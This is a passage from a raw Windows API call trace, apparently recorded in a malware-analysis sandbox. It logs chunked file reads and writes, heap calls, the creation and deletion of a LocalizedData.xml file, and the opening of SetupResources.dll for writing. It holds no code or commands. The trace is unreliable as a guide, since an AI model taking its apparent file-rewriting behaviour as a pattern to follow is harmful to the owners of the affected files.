lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.448] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.448] GetLastError () returned 0x0 [0067.448] SetLastError (dwErrCode=0x0) [0067.448] GetLastError () returned 0x0 [0067.448] SetLastError (dwErrCode=0x0) [0067.448] GetLastError () returned 0x0 [0067.448] SetLastError (dwErrCode=0x0) [0067.448] GetLastError () returned 0x0 [0067.449] SetLastError (dwErrCode=0x0) [0067.449] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.449] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.449] GetLastError () returned 0x0 [0067.449] SetLastError (dwErrCode=0x0) [0067.449] GetLastError () returned 0x0 [0067.449] SetLastError (dwErrCode=0x0) [0067.449] GetLastError () returned 0x0 [0067.449] SetLastError (dwErrCode=0x0) [0067.449] GetLastError () returned 0x0 [0067.449] SetLastError (dwErrCode=0x0) [0067.449] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.450] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.450] GetLastError () returned 0x0 [0067.450] SetLastError (dwErrCode=0x0) [0067.450] GetLastError () returned 0x0 [0067.450] SetLastError (dwErrCode=0x0) [0067.450] GetLastError () returned 0x0 [0067.450] SetLastError (dwErrCode=0x0) [0067.450] GetLastError () returned 0x0 [0067.450] SetLastError (dwErrCode=0x0) [0067.450] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.450] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.451] GetLastError () returned 0x0 [0067.451] SetLastError (dwErrCode=0x0) [0067.451] GetLastError () returned 0x0 [0067.451] SetLastError (dwErrCode=0x0) [0067.451] GetLastError () returned 0x0 [0067.451] SetLastError (dwErrCode=0x0) [0067.451] GetLastError () returned 0x0 [0067.451] SetLastError (dwErrCode=0x0) [0067.451] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.451] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.451] GetLastError () returned 0x0 [0067.451] SetLastError (dwErrCode=0x0) [0067.452] GetLastError () returned 0x0 [0067.452] SetLastError (dwErrCode=0x0) [0067.452] GetLastError () returned 0x0 [0067.452] SetLastError (dwErrCode=0x0) [0067.452] GetLastError () returned 0x0 [0067.452] SetLastError (dwErrCode=0x0) [0067.452] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.452] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.452] GetLastError () returned 0x0 [0067.453] SetLastError (dwErrCode=0x0) [0067.453] GetLastError () returned 0x0 [0067.453] SetLastError (dwErrCode=0x0) [0067.453] GetLastError () returned 0x0 [0067.453] SetLastError (dwErrCode=0x0) [0067.453] GetLastError () returned 0x0 [0067.453] SetLastError (dwErrCode=0x0) [0067.453] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.453] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.453] GetLastError () returned 0x0 [0067.453] SetLastError (dwErrCode=0x0) [0067.453] GetLastError () returned 0x0 [0067.453] SetLastError (dwErrCode=0x0) [0067.454] GetLastError () returned 0x0 [0067.454] SetLastError (dwErrCode=0x0) [0067.454] GetLastError () returned 0x0 [0067.454] SetLastError (dwErrCode=0x0) [0067.454] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.454] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.454] GetLastError () returned 0x0 [0067.454] SetLastError (dwErrCode=0x0) [0067.454] GetLastError () returned 0x0 [0067.454] SetLastError (dwErrCode=0x0) [0067.454] GetLastError () returned 0x0 [0067.454] SetLastError (dwErrCode=0x0) [0067.455] GetLastError () returned 0x0 [0067.455] SetLastError (dwErrCode=0x0) [0067.455] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.455] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.455] GetLastError () returned 0x0 [0067.455] SetLastError (dwErrCode=0x0) [0067.455] GetLastError () returned 0x0 [0067.455] SetLastError (dwErrCode=0x0) [0067.455] GetLastError () returned 0x0 [0067.455] SetLastError (dwErrCode=0x0) [0067.455] GetLastError () returned 0x0 [0067.455] SetLastError (dwErrCode=0x0) [0067.456] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.456] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.456] GetLastError () returned 0x0 [0067.456] SetLastError (dwErrCode=0x0) [0067.456] GetLastError () returned 0x0 [0067.456] SetLastError (dwErrCode=0x0) [0067.456] GetLastError () returned 0x0 [0067.456] SetLastError (dwErrCode=0x0) [0067.456] GetLastError () returned 0x0 [0067.456] SetLastError (dwErrCode=0x0) [0067.456] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.457] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.457] GetLastError () returned 0x0 [0067.457] SetLastError (dwErrCode=0x0) [0067.457] GetLastError () returned 0x0 [0067.457] SetLastError (dwErrCode=0x0) [0067.457] GetLastError () returned 0x0 [0067.457] SetLastError (dwErrCode=0x0) [0067.457] GetLastError () returned 0x0 [0067.457] SetLastError (dwErrCode=0x0) [0067.457] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0067.457] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.458] GetLastError () returned 0x0 [0067.458] SetLastError (dwErrCode=0x0) [0067.458] GetLastError () returned 0x0 [0067.458] SetLastError (dwErrCode=0x0) [0067.458] GetLastError () returned 0x0 [0067.458] SetLastError (dwErrCode=0x0) [0067.458] GetLastError () returned 0x0 [0067.458] SetLastError (dwErrCode=0x0) [0067.458] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x8bc, lpOverlapped=0x0) returned 1 [0067.458] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0067.458] GetLastError () returned 0x0 [0067.458] SetLastError (dwErrCode=0x0) [0067.459] GetLastError () returned 0x0 [0067.459] SetLastError (dwErrCode=0x0) [0067.459] ReadFile (in: hFile=0x428, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0067.459] GetLastError () returned 0x0 [0067.459] SetLastError (dwErrCode=0x0) [0067.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc) returned 0x7d768 [0067.459] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d540 [0067.459] GetLastError () returned 0x0 [0067.459] SetLastError (dwErrCode=0x0) [0067.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0067.459] WriteFile (in: hFile=0x420, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0x8c0, lpOverlapped=0x0) returned 1 [0067.459] GetLastError () returned 0x0 [0067.459] SetLastError (dwErrCode=0x0) [0067.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0067.459] GetLastError () returned 0x0 [0067.459] SetLastError (dwErrCode=0x0) [0067.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0067.459] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0067.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0067.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0067.460] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0067.460] CloseHandle (hObject=0x420) returned 1 [0067.462] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.462] CloseHandle (hObject=0x428) returned 1 [0067.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0067.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0067.462] AreFileApisANSI () returned 1 [0067.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.462] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0067.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 45 [0067.462] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0067.463] GetFileType (hFile=0x428) returned 0x1 [0067.464] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0067.464] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0067.464] GetLastError () returned 0xb7 [0067.464] SetLastError (dwErrCode=0xb7) [0067.464] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0067.465] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0067.465] CloseHandle (hObject=0x428) returned 1 [0067.466] AreFileApisANSI () returned 1 [0067.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0067.466] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71bd0 [0067.466] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e260, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml") returned 45 [0067.466] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0067.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.467] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.467] FindNextFileW (in: hFindFile=0x78110, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0067.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0067.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0067.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0067.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0067.467] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0067.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0067.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0067.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0067.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0067.468] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0067.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0067.468] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0067.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0067.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0067.593] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0067.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0067.593] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0067.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0067.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0067.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0067.594] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0067.594] AreFileApisANSI () returned 1 [0067.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0067.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0067.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.594] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0067.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0067.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0067.594] AreFileApisANSI () returned 1 [0067.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.594] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71688 [0067.594] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 46 [0067.594] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.595] GetFileType (hFile=0x420) returned 0x1 [0067.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0067.595] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0067.595] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0067.595] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0067.595] CloseHandle (hObject=0x420) returned 1 [0067.595] AreFileApisANSI () returned 1 [0067.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0067.595] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71758 [0067.595] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71758, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\SetupResources.dll") returned 46 [0067.595] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0067.596] GetFileType (hFile=0x420) returned 0x1 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0067.596] CloseHandle (hObject=0x420) returned 1 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0067.596] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0067.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0067.596] RtlAllocateHeap 